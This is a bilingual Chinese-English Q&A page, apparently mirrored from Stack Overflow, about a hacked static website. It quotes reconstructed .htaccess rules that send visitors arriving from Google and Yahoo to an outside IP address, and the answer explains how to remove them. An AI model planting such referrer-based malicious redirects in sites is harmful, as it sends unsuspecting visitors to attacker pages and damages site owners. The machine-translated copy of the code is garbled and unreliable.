我的网站被黑客入侵,htaccess文件被盗,应该是什么样? [英] My site was hacked, htaccess file compromised, what should it look like?
问题描述
我维护公益性的网站被黑客入侵,向游戏网站等投放了302条信息。www.rebekahshouse.org。在对托管公司的控制面板进行大量搜索之后,我在htaccess文件中找到了罪魁祸首。
看起来像这样:
上的RewriteEngine
RewriteCond%{HTTP_REFERER} .oogle.com [NC,OR]
RewriteCond%{HTTP_REFERER} .ahoo.com [NC,OR]
RewriteRule。* hxxp://87.248.180.89/topic.html?s = s- [C,L]
A website I maintain pro-bono was hacked, dishing out 302s to gaming sites, etc. www.rebekahshouse.org. After much searching through my hosting company's control panel, I found the culprit in the htaccess file.
It looked something like this:
RewriteEngine on
RewriteCond %{HTTP_REFERER} .oogle.com [NC,OR]
RewriteCond %{HTTP_REFERER} .ahoo.com [NC,OR]
RewriteRule .*hxxp://87.248.180.89/topic.html?s=s- [C,L]
(我认为是C,L;我重写了它并试图在上面重新创建它,可能在这里错过了一块,
(I think that was C, L; I overwrote it and tried to recreate it above, might've missed a piece here and there)
无论如何,我用以下方法重写了它:
Anyway, I overwrote it with this:
订单允许,拒绝
拒绝所有
这对我有用吗? .htaccess文件中应该包含什么?
Is this going to anything for me? What SHOULD I have in my .htaccess file? This is purely a static html site.
谢谢!
推荐答案
(根据@YGomez的评论:首先,您需要关闭允许创建该.htaccess文件的漏洞,否则该恶意软件几乎会立即回来;我可能应该明确提到这一点)。
(As per @YGomez's comment: first and foremost, you need to close the vulnerability which allowed the creation of that .htaccess file, else the malware will come back almost instantly; I probably should have mentioned that explicitly)
第一部分会将所有来自yahoo和google的访问者重定向到87.248.180.89
The first part will redirect all visitors coming in from yahoo and google to 87.248.180.89
第二部分(允许,拒绝 )将拒绝所有人访问您的网站。
The second part ("allow, deny") will deny access to your site for everybody.
我建议您删除.htaccess文件并进行处理-如果您使用.htaccess文件,您会知道里面有什么,否则您不需要它。
I suggest to simply delete the .htaccess and be done with it - if you use a .htaccess file, you would know what goes in there, else you don't need it.
这篇关于我的网站被黑客入侵,htaccess文件被盗,应该是什么样?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
